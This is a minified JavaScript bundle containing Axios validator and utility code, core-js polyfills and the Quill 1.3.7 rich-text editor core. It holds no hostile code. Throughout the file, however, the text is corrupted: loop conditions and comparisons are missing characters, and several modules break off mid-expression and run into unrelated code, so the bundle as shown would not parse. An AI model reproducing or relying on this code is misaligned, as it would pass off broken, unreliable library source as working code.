i=n(7600).version,t=n(4531),r={};["object","boolean","number","function","string","symbol"].forEach((function(e,a){r[e]=function(n){return typeof n===e||"a"+(a<1?"n ":" ")+e}}));var o={};r.transitional=function(e,a,n){function r(e,a){return"[Axios v"+i+"] Transitional option '"+e+"'"+a+(n?". "+n:"")}return function(n,i,s){if(!1===e)throw new t(r(i," has been removed"+(a?" in "+a:"")),t.ERR_DEPRECATED);return a&&!o[i]&&(o[i]=!0,console.warn(r(i," has been deprecated since v"+a+" and will be removed in the near future"))),!e||e(n,i,s)}},e.exports={assertOptions:function(e,a,n){if("object"!==typeof e)throw new t("options must be an object",t.ERR_BAD_OPTION_VALUE);for(var i=Object.keys(e),r=i.length;r-- >0;){var o=i[r],s=a[o];if(s){var l=e[o],u=void 0===l||s(l,o,e);if(!0!==u)throw new t("option "+o+" must be "+u,t.ERR_BAD_OPTION_VALUE)}else if(!0!==n)throw new t("Unknown option "+o,t.ERR_BAD_OPTION)}},validators:r}},3589:function(e,a,n){"use strict";var i,t=n(4049),r=Object.prototype.toString,o=(i=Object.create(null),function(e){var a=r.call(e);return i[a]||(i[a]=a.slice(8,-1).toLowerCase())});function s(e){return e=e.toLowerCase(),function(a){return o(a)===e}}function l(e){return Array.isArray(e)}function u(e){return"undefined"===typeof e}var c=s("ArrayBuffer");function d(e){return null!==e&&"object"===typeof e}function h(e){if("object"!==o(e))return!1;var a=Object.getPrototypeOf(e);return null===a||a===Object.prototype}var p=s("Date"),m=s("File"),f=s("Blob"),v=s("FileList");function g(e){return"[object Function]"===r.call(e)}var b=s("URLSearchParams");function k(e,a){if(null!==e&&"undefined"!==typeof e)if("object"!==typeof e&&(e=[e]),l(e))for(var n=0,i=e.length;n0;)o[r=i[t]]||(a[r]=e[r],o[r]=!0);e=Object.getPrototypeOf(e)}while(e&&(!n||n(e,a))&&e!==Object.prototype);return a},kindOf:o,kindOfTest:s,endsWith:function(e,a,n){e=String(e),(void 0===n||n>e.length)&&(n=e.length),n-=a.length;var i=e.indexOf(a,n);return-1!==i&&i===n},toArray:function(e){if(!e)return null;var a=e.length;if(u(a))return null;for(var n=new Array(a);a-- >0;)n[a]=e[a];return n},isTypedArray:x,isFileList:v}},5867:function(e){var a=!("undefined"===typeof window||!window.document||!window.document.createElement);e.exports=a},8182:function(e,a,n){"use strict";function i(e){var a,n,t="";if("string"===typeof e||"number"===typeof e)t+=e;else if("object"===typeof e)if(Array.isArray(e))for(a=0;ac;)if((s=l[c++])!=s)return!0}else for(;u>c;c++)if((e||c in l)&&l[c]===n)return e||c||0;return!e&&-1}};e.exports={includes:o(!0),indexOf:o(!1)}},5880:function(e,a,n){var i=n(5851),t=n(4932),r=n(1036),o=n(8385),s=n(3385),l=n(5491),u=t([].push),c=function(e){var a=1==e,n=2==e,t=3==e,c=4==e,d=6==e,h=7==e,p=5==e||d;return function(m,f,v,g){for(var b,k,y=o(m),x=r(y),S=i(f,v),A=s(x),w=0,M=g||l,j=a?M(m,A):n||h?M(m,0):void 0;A>w;w++)if((p||w in x)&&(k=S(b=x[w],w,y),e))if(a)j[w]=k;else if(k)switch(e){case 3:return!0;case 5:return b;case 6:return w;case 2:u(j,b)}else switch(e){case 4:return!1;case 7:u(j,b)}return d?-1:t||c?c:j}};e.exports={forEach:c(0),map:c(1),filter:c(2),some:c(3),every:c(4),find:c(5),findIndex:c(6),filterReject:c(7)}},1379:function(e,a,n){var i=n(2837),t=n(5028),r=n(5372),o=t("species");e.exports=function(e){return r>=51||!i((function(){var a=[];return(a.constructor={})[o]=function(){return{foo:1}},1!==a[e](Boolean).foo}))}},2241:function(e,a,n){"use strict";var i=n(2837);e.exports=function(e,a){var n=[][e];return!!n&&i((function(){n.call(null,a||function(){return 1},1)}))}},4512:function(e,a,n){var i=n(6840),t=n(6724),r=n(8385),o=n(1036),s=n(3385),l=i.TypeError,u=function(e){return function(a,n,i,u){t(n);var c=r(a),d=o(c),h=s(c),p=e?h-1:0,m=e?-1:1;if(i<2)for(;;){if(p in d){u=d[p],p+=m;break}if(p+=m,e?p<0:h<=p)throw l("Reduce of empty array with no initial value")}for(;e?p>=0:h>p;p+=m)p in d&&(u=n(u,d[p],p,c));return u}};e.exports={left:u(!1),right:u(!0)}},3278:function(e,a,n){var i=n(6840),t=n(1823),r=n(3385),o=n(3055),s=i.Array,l=Math.max;e.exports=function(e,a,n){for(var i=r(e),u=t(a,i),c=t(void 0===n?i:n,i),d=s(l(c-u,0)),h=0;u0&&i[0]<4?1:+(i[0]+i[1])),!t&&o&&(!(i=o.match(/Edge\/(\d+)/))||i[1]>=74)&&(i=o.match(/Chrome\/(\d+)/))&&(t=+i[1]),e.exports=t},2080:function(e){e.exports=["constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","valueOf"]},7768:function(e,a,n){var i=n(6840),t=n(2573).f,r=n(3873),o=n(2422),s=n(9870),l=n(189),u=n(6673);e.exports=function(e,a){var n,c,d,h,p,m=e.target,f=e.global,v=e.stat;if(n=f?i:v?i[m]||s(m,{}):(i[m]||{}).prototype)for(c in a){if(h=a[c],d=e.noTargetGet?(p=t(n,c))&&p.value:n[c],!u(f?c:m+(v?".":"#")+c,e.forced)&&void 0!==d){if(typeof h==typeof d)continue;l(h,d)}(e.sham||d&&d.sham)&&r(h,"sham",!0),o(n,c,h,e)}}},2837:function(e){e.exports=function(e){try{return!!e()}catch(a){return!0}}},8093:function(e,a,n){"use strict";n(447);var i=n(4932),t=n(2422),r=n(4087),o=n(2837),s=n(5028),l=n(3873),u=s("species"),c=RegExp.prototype;e.exports=function(e,a,n,d){var h=s(e),p=!o((function(){var a={};return a[h]=function(){return 7},7!=""[e](a)})),m=p&&!o((function(){var a=!1,n=/a/;return"split"===e&&((n={}).constructor={},n.constructor[u]=function(){return n},n.flags="",n[h]=/./[h]),n.exec=function(){return a=!0,null},n[h](""),!a}));if(!p||!m||n){var f=i(/./[h]),v=a(h,""[e],(function(e,a,n,t,o){var s=i(e),l=a.exec;return l===r||l===c.exec?p&&!o?{done:!0,value:f(a,n,t)}:{done:!0,value:s(n,a,t)}:{done:!1}}));t(String.prototype,e,v[0]),t(c,h,v[1])}d&&l(c[h],"sham",!0)}},7914:function(e,a,n){var i=n(2837);e.exports=!i((function(){return Object.isExtensible(Object.preventExtensions({}))}))},6339:function(e,a,n){var i=n(4138),t=Function.prototype,r=t.apply,o=t.call;e.exports="object"==typeof Reflect&&Reflect.apply||(i?o.bind(r):function(){return o.apply(r,arguments)})},5851:function(e,a,n){var i=n(4932),t=n(6724),r=n(4138),o=i(i.bind);e.exports=function(e,a){return t(e),void 0===a?e:r?o(e,a):function(){return e.apply(a,arguments)}}},4138:function(e,a,n){var i=n(2837);e.exports=!i((function(){var e=function(){}.bind();return"function"!=typeof e||e.hasOwnProperty("prototype")}))},8513:function(e,a,n){var i=n(4138),t=Function.prototype.call;e.exports=i?t.bind(t):function(){return t.apply(t,arguments)}},3211:function(e,a,n){var i=n(1196),t=n(3013),r=Function.prototype,o=i&&Object.getOwnPropertyDescriptor,s=t(r,"name"),l=s&&"something"===function(){}.name,u=s&&(!i||i&&o(r,"name").configurable);e.exports={EXISTS:s,PROPER:l,CONFIGURABLE:u}},4932:function(e,a,n){var i=n(4138),t=Function.prototype,r=t.bind,o=t.call,s=i&&r.bind(o,o);e.exports=i?function(e){return e&&s(e)}:function(e){return e&&function(){return o.apply(e,arguments)}}},1240:function(e,a,n){var i=n(6840),t=n(9218),r=function(e){return t(e)?e:void 0};e.exports=function(e,a){return arguments.length<2?r(i[e]):i[e]&&i[e][a]}},443:function(e,a,n){var i=n(7205),t=n(3863),r=n(9706),o=n(5028)("iterator");e.exports=function(e){if(void 0!=e)return t(e,o)||t(e,"@@iterator")||r[i(e)]}},8131:function(e,a,n){var i=n(6840),t=n(8513),r=n(6724),o=n(5884),s=n(1772),l=n(443),u=i.TypeError;e.exports=function(e,a){var n=arguments.length<2?l(e):a;if(r(n))return o(t(n,e));throw u(s(e)+" is not iterable")}},3863:function(e,a,n){var i=n(6724);e.exports=function(e,a){var n=e[a];return null==n?void 0:i(n)}},7794:function(e,a,n){var i=n(4932),t=n(8385),r=Math.floor,o=i("".charAt),s=i("".replace),l=i("".slice),u=/\$([$&'`]|\d{1,2}|<[^>]*>)/g,c=/\$([$&'`]|\d{1,2})/g;e.exports=function(e,a,n,i,d,h){var p=n+e.length,m=i.length,f=c;return void 0!==d&&(d=t(d),f=u),s(h,f,(function(t,s){var u;switch(o(s,0)){case"$":return"$";case"&":return e;case"`":return l(a,0,n);case"'":return l(a,p);case"<":u=d[l(s,1,-1)];break;default:var c=+s;if(0===c)return t;if(c>m){var h=r(c/10);return 0===h?t:h<=m?void 0===i[h-1]?o(s,1):i[h-1]+o(s,1):t}u=i[c-1]}return void 0===u?"":u}))}},6840:function(e,a,n){var i=function(e){return e&&e.Math==Math&&e};e.exports=i("object"==typeof globalThis&&globalThis)||i("object"==typeof window&&window)||i("object"==typeof self&&self)||i("object"==typeof n.g&&n.g)||function(){return this}()||Function("return this")()},3013:function(e,a,n){var i=n(4932),t=n(8385),r=i({}.hasOwnProperty);e.exports=Object.hasOwn||function(e,a){return r(t(e),a)}},6196:function(e){e.exports={}},2012:function(e,a,n){var i=n(1240);e.exports=i("document","documentElement")},6707:function(e,a,n){var i=n(1196),t=n(2837),r=n(937);e.exports=!i&&!t((function(){return 7!=Object.defineProperty(r("div"),"a",{get:function(){return 7}}).a}))},1036:function(e,a,n){var i=n(6840),t=n(4932),r=n(2837),o=n(2933),s=i.Object,l=t("".split);e.exports=r((function(){return!s("z").propertyIsEnumerable(0)}))?function(e){return"String"==o(e)?l(e,""):s(e)}:s},1527:function(e,a,n){var i=n(9218),t=n(3931),r=n(4381);e.exports=function(e,a,n){var o,s;return r&&i(o=a.constructor)&&o!==n&&t(s=o.prototype)&&s!==n.prototype&&r(e,s),e}},8589:function(e,a,n){var i=n(4932),t=n(9218),r=n(4460),o=i(Function.toString);t(r.inspectSource)||(r.inspectSource=function(e){return o(e)}),e.exports=r.inspectSource},2499:function(e,a,n){var i=n(7768),t=n(4932),r=n(6196),o=n(3931),s=n(3013),l=n(1592).f,u=n(3772),c=n(8910),d=n(6643),h=n(6520),p=n(7914),m=!1,f=h("meta"),v=0,g=function(e){l(e,f,{value:{objectID:"O"+v++,weakData:{}}})},b=e.exports={enable:function(){b.enable=function(){},m=!0;var e=u.f,a=t([].splice),n={};n[f]=1,e(n).length&&(u.f=function(n){for(var i=e(n),t=0,r=i.length;tb;b++)if((y=B(e[b]))&&c(v,y))return y;return new f(!1)}i=d(e,g)}for(x=i.next;!(S=r(x,i)).done;){try{y=B(S.value)}catch(T){p(i,"throw",T)}if("object"==typeof y&&y&&c(v,y))return y}return new f(!1)}},9053:function(e,a,n){var i=n(8513),t=n(5884),r=n(3863);e.exports=function(e,a,n){var o,s;t(e);try{if(!(o=r(e,"return"))){if("throw"===a)throw n;return n}o=i(o,e)}catch(l){s=!0,o=l}if("throw"===a)throw n;if(s)throw o;return t(o),n}},7022:function(e,a,n){"use strict";var i,t,r,o=n(2837),s=n(9218),l=n(4385),u=n(4305),c=n(2422),d=n(5028),h=n(3608),p=d("iterator"),m=!1;[].keys&&("next"in(r=[].keys())?(t=u(u(r)))!==Object.prototype&&(i=t):m=!0),void 0==i||o((function(){var e={};return i[p].call(e)!==e}))?i={}:h&&(i=l(i)),s(i[p])||c(i,p,(function(){return this})),e.exports={IteratorPrototype:i,BUGGY_SAFARI_ITERATORS:m}},9706:function(e){e.exports={}},3385:function(e,a,n){var i=n(2347);e.exports=function(e){return i(e.length)}},3991:function(e,a,n){var i=n(5372),t=n(2837);e.exports=!!Object.getOwnPropertySymbols&&!t((function(){var e=Symbol();return!String(e)||!(Object(e)instanceof Symbol)||!Symbol.sham&&i&&i<41}))},5242:function(e,a,n){var i=n(6840),t=n(9218),r=n(8589),o=i.WeakMap;e.exports=t(o)&&/native code/.test(r(o))},9139:function(e,a,n){var i=n(6840),t=n(2837),r=n(4932),o=n(6124),s=n(6889).trim,l=n(5450),u=i.parseInt,c=i.Symbol,d=c&&c.iterator,h=/^[+-]?0x/i,p=r(h.exec),m=8!==u(l+"08")||22!==u(l+"0x16")||d&&!t((function(){u(Object(d))}));e.exports=m?function(e,a){var n=s(o(e));return u(n,a>>>0||(p(h,n)?16:10))}:u},2526:function(e,a,n){"use strict";var i=n(1196),t=n(4932),r=n(8513),o=n(2837),s=n(8084),l=n(400),u=n(8306),c=n(8385),d=n(1036),h=Object.assign,p=Object.defineProperty,m=t([].concat);e.exports=!h||o((function(){if(i&&1!==h({b:1},h(p({},"a",{enumerable:!0,get:function(){p(this,"b",{value:3,enumerable:!1})}}),{b:2})).b)return!0;var e={},a={},n=Symbol(),t="abcdefghijklmnopqrst";return e[n]=7,t.split("").forEach((function(e){a[e]=e})),7!=h({},e)[n]||s(h({},a)).join("")!=t}))?function(e,a){for(var n=c(e),t=arguments.length,o=1,h=l.f,p=u.f;t>o;)for(var f,v=d(arguments[o++]),g=h?m(s(v),h(v)):s(v),b=g.length,k=0;b>k;)f=g[k++],i&&!r(p,v,f)||(n[f]=v[f]);return n}:h},4385:function(e,a,n){var i,t=n(5884),r=n(1697),o=n(2080),s=n(6196),l=n(2012),u=n(937),c=n(9378),d=c("IE_PROTO"),h=function(){},p=function(e){return"
"+t+"


");this.setContents(r),this.history.clear(),this.options.placeholder&&this.root.setAttribute("data-placeholder",this.options.placeholder),this.options.readOnly&&this.disable()}return r(e,null,[{key:"debug",value:function(e){!0===e&&(e="log"),m.default.level(e)}},{key:"find",value:function(e){return e.__quill||c.default.find(e)}},{key:"import",value:function(e){return null==this.imports[e]&&k.error("Cannot import "+e+". Are you sure it was registered?"),this.imports[e]}},{key:"register",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]&&arguments[2];if("string"!==typeof e){var t=e.attrName||e.blotName;"string"===typeof t?this.register("formats/"+t,e,a):Object.keys(e).forEach((function(i){n.register(i,e[i],a)}))}else null==this.imports[e]||i||k.warn("Overwriting "+e+" with",a),this.imports[e]=a,(e.startsWith("blots/")||e.startsWith("formats/"))&&"abstract"!==a.blotName?c.default.register(a):e.startsWith("modules")&&"function"===typeof a.register&&a.register()}}]),r(e,[{key:"addContainer",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if("string"===typeof e){var n=e;(e=document.createElement("div")).classList.add(n)}return this.container.insertBefore(e,a),e}},{key:"blur",value:function(){this.selection.setRange(null)}},{key:"deleteText",value:function(e,a,n){var i=this,r=A(e,a,n),o=t(r,4);return e=o[0],a=o[1],n=o[3],S.call(this,(function(){return i.editor.deleteText(e,a)}),n,e,-1*a)}},{key:"disable",value:function(){this.enable(!1)}},{key:"enable",value:function(){var e=!(arguments.length>0&&void 0!==arguments[0])||arguments[0];this.scroll.enable(e),this.container.classList.toggle("ql-disabled",!e)}},{key:"focus",value:function(){var e=this.scrollingContainer.scrollTop;this.selection.focus(),this.scrollingContainer.scrollTop=e,this.scrollIntoView()}},{key:"format",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:l.default.sources.API;return S.call(this,(function(){var i=n.getSelection(!0),t=new o.default;if(null==i)return t;if(c.default.query(e,c.default.Scope.BLOCK))t=n.editor.formatLine(i.index,i.length,g({},e,a));else{if(0===i.length)return n.selection.format(e,a),t;t=n.editor.formatText(i.index,i.length,g({},e,a))}return n.setSelection(i,l.default.sources.SILENT),t}),i)}},{key:"formatLine",value:function(e,a,n,i,r){var o,s=this,l=A(e,a,n,i,r),u=t(l,4);return e=u[0],a=u[1],o=u[2],r=u[3],S.call(this,(function(){return s.editor.formatLine(e,a,o)}),r,e,0)}},{key:"formatText",value:function(e,a,n,i,r){var o,s=this,l=A(e,a,n,i,r),u=t(l,4);return e=u[0],a=u[1],o=u[2],r=u[3],S.call(this,(function(){return s.editor.formatText(e,a,o)}),r,e,0)}},{key:"getBounds",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,n=void 0;n="number"===typeof e?this.selection.getBounds(e,a):this.selection.getBounds(e.index,e.length);var i=this.container.getBoundingClientRect();return{bottom:n.bottom-i.top,height:n.height,left:n.left-i.left,right:n.right-i.left,top:n.top-i.top,width:n.width}}},{key:"getContents",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:this.getLength()-e,n=A(e,a),i=t(n,2);return e=i[0],a=i[1],this.editor.getContents(e,a)}},{key:"getFormat",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:this.getSelection(!0),a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0;return"number"===typeof e?this.editor.getFormat(e,a):this.editor.getFormat(e.index,e.length)}},{key:"getIndex",value:function(e){return e.offset(this.scroll)}},{key:"getLength",value:function(){return this.scroll.length()}},{key:"getLeaf",value:function(e){return this.scroll.leaf(e)}},{key:"getLine",value:function(e){return this.scroll.line(e)}},{key:"getLines",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:Number.MAX_VALUE;return"number"!==typeof e?this.scroll.lines(e.index,e.length):this.scroll.lines(e,a)}},{key:"getModule",value:function(e){return this.theme.modules[e]}},{key:"getSelection",value:function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0];return e&&this.focus(),this.update(),this.selection.getRange()[0]}},{key:"getText",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:0,a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:this.getLength()-e,n=A(e,a),i=t(n,2);return e=i[0],a=i[1],this.editor.getText(e,a)}},{key:"hasFocus",value:function(){return this.selection.hasFocus()}},{key:"insertEmbed",value:function(a,n,i){var t=this,r=arguments.length>3&&void 0!==arguments[3]?arguments[3]:e.sources.API;return S.call(this,(function(){return t.editor.insertEmbed(a,n,i)}),r,a)}},{key:"insertText",value:function(e,a,n,i,r){var o,s=this,l=A(e,0,n,i,r),u=t(l,4);return e=u[0],o=u[2],r=u[3],S.call(this,(function(){return s.editor.insertText(e,a,o)}),r,e,a.length)}},{key:"isEnabled",value:function(){return!this.container.classList.contains("ql-disabled")}},{key:"off",value:function(){return this.emitter.off.apply(this.emitter,arguments)}},{key:"on",value:function(){return this.emitter.on.apply(this.emitter,arguments)}},{key:"once",value:function(){return this.emitter.once.apply(this.emitter,arguments)}},{key:"pasteHTML",value:function(e,a,n){this.clipboard.dangerouslyPasteHTML(e,a,n)}},{key:"removeFormat",value:function(e,a,n){var i=this,r=A(e,a,n),o=t(r,4);return e=o[0],a=o[1],n=o[3],S.call(this,(function(){return i.editor.removeFormat(e,a)}),n,e)}},{key:"scrollIntoView",value:function(){this.selection.scrollIntoView(this.scrollingContainer)}},{key:"setContents",value:function(e){var a=this,n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:l.default.sources.API;return S.call(this,(function(){e=new o.default(e);var n=a.getLength(),i=a.editor.deleteText(0,n),t=a.editor.applyDelta(e),r=t.ops[t.ops.length-1];return null!=r&&"string"===typeof r.insert&&"\n"===r.insert[r.insert.length-1]&&(a.editor.deleteText(a.getLength()-1,1),t.delete(1)),i.compose(t)}),n)}},{key:"setSelection",value:function(a,n,i){if(null==a)this.selection.setRange(null,n||e.sources.API);else{var r=A(a,n,i),o=t(r,4);a=o[0],n=o[1],i=o[3],this.selection.setRange(new d.Range(a,n),i),i!==l.default.sources.SILENT&&this.selection.scrollIntoView(this.scrollingContainer)}}},{key:"setText",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:l.default.sources.API,n=(new o.default).insert(e);return this.setContents(n,a)}},{key:"update",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:l.default.sources.USER,a=this.scroll.update(e);return this.selection.update(e),a}},{key:"updateContents",value:function(e){var a=this,n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:l.default.sources.API;return S.call(this,(function(){return e=new o.default(e),a.editor.applyDelta(e,n)}),n,!0)}}]),e}();function x(e,a){if((a=(0,p.default)(!0,{container:e,modules:{clipboard:!0,keyboard:!0,history:!0}},a)).theme&&a.theme!==y.DEFAULTS.theme){if(a.theme=y.import("themes/"+a.theme),null==a.theme)throw new Error("Invalid theme "+a.theme+". Did you register it?")}else a.theme=f.default;var n=(0,p.default)(!0,{},a.theme.DEFAULTS);[n,a].forEach((function(e){e.modules=e.modules||{},Object.keys(e.modules).forEach((function(a){!0===e.modules[a]&&(e.modules[a]={})}))}));var i=Object.keys(n.modules).concat(Object.keys(a.modules)).reduce((function(e,a){var n=y.import("modules/"+a);return null==n?k.error("Cannot load "+a+" module. Are you sure you registered it?"):e[a]=n.DEFAULTS||{},e}),{});return null!=a.modules&&a.modules.toolbar&&a.modules.toolbar.constructor!==Object&&(a.modules.toolbar={container:a.modules.toolbar}),a=(0,p.default)(!0,{},y.DEFAULTS,{modules:i},n,a),["bounds","container","scrollingContainer"].forEach((function(e){"string"===typeof a[e]&&(a[e]=document.querySelector(a[e]))})),a.modules=Object.keys(a.modules).reduce((function(e,n){return a.modules[n]&&(e[n]=a.modules[n]),e}),{}),a}function S(e,a,n,i){if(this.options.strict&&!this.isEnabled()&&a===l.default.sources.USER)return new o.default;var t=null==n?null:this.getSelection(),r=this.editor.delta,s=e();if(null!=t&&(!0===n&&(n=t.index),null==i?t=w(t,s,a):0!==i&&(t=w(t,n,i,a)),this.setSelection(t,l.default.sources.SILENT)),s.length()>0){var u,c,d=[l.default.events.TEXT_CHANGE,s,r,a];(u=this.emitter).emit.apply(u,[l.default.events.EDITOR_CHANGE].concat(d)),a!==l.default.sources.SILENT&&(c=this.emitter).emit.apply(c,d)}return s}function A(e,a,n,t,r){var o={};return"number"===typeof e.index&&"number"===typeof e.length?"number"!==typeof a?(r=t,t=n,n=a,a=e.length,e=e.index):(a=e.length,e=e.index):"number"!==typeof a&&(r=t,t=n,n=a,a=0),"object"===("undefined"===typeof n?"undefined":i(n))?(o=n,r=t):"string"===typeof n&&(null!=t?o[n]=t:r=n),[e,a,o,r=r||l.default.sources.API]}function w(e,a,n,i){if(null==e)return null;var r=void 0,s=void 0;if(a instanceof o.default){var u=[e.index,e.index+e.length].map((function(e){return a.transformPosition(e,i!==l.default.sources.USER)})),c=t(u,2);r=c[0],s=c[1]}else{var h=[e.index,e.index+e.length].map((function(e){return e=0?e+n:Math.max(a,e+n)})),p=t(h,2);r=p[0],s=p[1]}return new d.Range(r,s-r)}y.DEFAULTS={bounds:null,formats:null,modules:{},placeholder:"",readOnly:!1,scrollingContainer:null,strict:!0,theme:"default"},y.events=l.default.events,y.sources=l.default.sources,y.version="1.3.7",y.imports={delta:o.default,parchment:c.default,"core/module":u.default,"core/theme":f.default},a.expandConfig=x,a.overload=A,a.default=y},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=function(){function e(e,a){for(var n=0;n0){var n=this.parent.isolate(this.offset(),this.length());this.moveChildren(n),n.wrap(this)}}}],[{key:"compare",value:function(e,n){var i=a.order.indexOf(e),t=a.order.indexOf(n);return i>=0||t>=0?i-t:e===n?0:e1?a-1:0),i=1;i1&&void 0!==arguments[1]?arguments[1]:{};i(this,e),this.quill=a,this.options=n};t.DEFAULTS={},a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=["error","warn","log","info"],t="warn";function r(e){if(i.indexOf(e)<=i.indexOf(t)){for(var a,n=arguments.length,r=Array(n>1?n-1:0),o=1;o=0;u--)if(d[u]!=h[u])return!1;for(u=d.length-1;u>=0;u--)if(c=d[u],!o(e[c],a[c],n))return!1;return typeof e===typeof a}(e,a,n))};function s(e){return null===e||void 0===e}function l(e){return!(!e||"object"!==typeof e||"number"!==typeof e.length)&&"function"===typeof e.copy&&"function"===typeof e.slice&&!(e.length>0&&"number"!==typeof e[0])}},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i=n(1),t=function(){function e(e,a,n){void 0===n&&(n={}),this.attrName=e,this.keyName=a;var t=i.Scope.TYPE&i.Scope.ATTRIBUTE;null!=n.scope?this.scope=n.scope&i.Scope.LEVEL|t:this.scope=i.Scope.ATTRIBUTE,null!=n.whitelist&&(this.whitelist=n.whitelist)}return e.keys=function(e){return[].map.call(e.attributes,(function(e){return e.name}))},e.prototype.add=function(e,a){return!!this.canAdd(e,a)&&(e.setAttribute(this.keyName,a),!0)},e.prototype.canAdd=function(e,a){return null!=i.query(e,i.Scope.BLOT&(this.scope|i.Scope.TYPE))&&(null==this.whitelist||("string"===typeof a?this.whitelist.indexOf(a.replace(/["']/g,""))>-1:this.whitelist.indexOf(a)>-1))},e.prototype.remove=function(e){e.removeAttribute(this.keyName)},e.prototype.value=function(e){var a=e.getAttribute(this.keyName);return this.canAdd(e,a)&&a?a:""},e}();a.default=t},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0}),a.default=a.Code=void 0;var i=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},t=function(){function e(e,a){for(var n=0;n=e+n)){var o=this.newlineIndex(e,!0)+1,l=r-o+1,u=this.isolate(o,l),c=u.next;u.format(i,t),c instanceof a&&c.formatAt(0,e-o+n-l,i,t)}}}},{key:"insertAt",value:function(e,a,n){if(null==n){var t=this.descendant(c.default,e),r=i(t,2),o=r[0],s=r[1];o.insertAt(s,a)}}},{key:"length",value:function(){var e=this.domNode.textContent.length;return this.domNode.textContent.endsWith("\n")?e:e+1}},{key:"newlineIndex",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]&&arguments[1];if(a)return this.domNode.textContent.slice(0,e).lastIndexOf("\n");var n=this.domNode.textContent.slice(e).indexOf("\n");return n>-1?e+n:-1}},{key:"optimize",value:function(e){this.domNode.textContent.endsWith("\n")||this.appendChild(s.default.create("text","\n")),r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"optimize",this).call(this,e);var n=this.next;null!=n&&n.prev===this&&n.statics.blotName===this.statics.blotName&&this.statics.formats(this.domNode)===n.statics.formats(n.domNode)&&(n.optimize(e),n.moveChildren(this),n.remove())}},{key:"replace",value:function(e){r(a.prototype.__proto__||Object.getPrototypeOf(a.prototype),"replace",this).call(this,e),[].slice.call(this.domNode.querySelectorAll("*")).forEach((function(e){var a=s.default.find(e);null==a?e.parentNode.removeChild(e):a instanceof s.default.Embed?a.remove():a.unwrap()}))}}],[{key:"create",value:function(e){var n=r(a.__proto__||Object.getPrototypeOf(a),"create",this).call(this,e);return n.setAttribute("spellcheck",!1),n}},{key:"formats",value:function(){return!0}}]),a}(l.default);v.blotName="code-block",v.tagName="PRE",v.TAB=" ",a.Code=f,a.default=v},function(e,a,n){"use strict";Object.defineProperty(a,"__esModule",{value:!0});var i="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t=function(e,a){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return function(e,a){var n=[],i=!0,t=!1,r=void 0;try{for(var o,s=e[Symbol.iterator]();!(i=(o=s.next()).done)&&(n.push(o.value),!a||n.length!==a);i=!0);}catch(l){t=!0,r=l}finally{try{!i&&s.return&&s.return()}finally{if(t)throw r}}return n}(e,a);throw new TypeError("Invalid attempt to destructure non-iterable instance")},r=function(){function e(e,a){for(var n=0;n=r&&!p.endsWith("\n")&&(n=!0),a.scroll.insertAt(e,p);var m=a.scroll.line(e),f=t(m,2),g=f[0],b=f[1],k=(0,v.default)({},(0,d.bubbleFormats)(g));if(g instanceof h.default){var y=g.descendant(l.default.Leaf,b),x=t(y,1)[0];k=(0,v.default)(k,(0,d.bubbleFormats)(x))}c=s.default.attributes.diff(k,c)||{}}else if("object"===i(o.insert)){var S=Object.keys(o.insert)[0];if(null==S)return e;a.scroll.insertAt(e,S,o.insert[S])}r+=u}return Object.keys(c).forEach((function(n){a.scroll.formatAt(e,u,n,c[n])})),e+u}),0),e.reduce((function(e,n){return"number"===typeof n.delete?(a.scroll.deleteAt(e,n.delete),e):e+(n.retain||n.insert.length||1)}),0),this.scroll.batchEnd(),this.update(e)}},{key:"deleteText",value:function(e,a){return this.scroll.deleteAt(e,a),this.update((new o.default).retain(e).delete(a))}},{key:"formatLine",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return this.scroll.update(),Object.keys(i).forEach((function(t){if(null==n.scroll.whitelist||n.scroll.whitelist[t]){var r=n.scroll.lines(e,Math.max(a,1)),o=a;r.forEach((function(a){var r=a.length();if(a instanceof u.default){var s=e-a.offset(n.scroll),l=a.newlineIndex(s+o)-s+1;a.formatAt(s,l,t,i[t])}else a.format(t,i[t]);o-=r}))}})),this.scroll.optimize(),this.update((new o.default).retain(e).retain(a,(0,m.default)(i)))}},{key:"formatText",value:function(e,a){var n=this,i=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};return Object.keys(i).forEach((function(t){n.scroll.formatAt(e,a,t,i[t])})),this.update((new o.default).retain(e).retain(a,(0,m.default)(i)))}},{key:"getContents",value:function(e,a){return this.delta.slice(e,e+a)}},{key:"getDelta",value:function(){return this.scroll.lines().reduce((function(e,a){return e.concat(a.delta())}),new 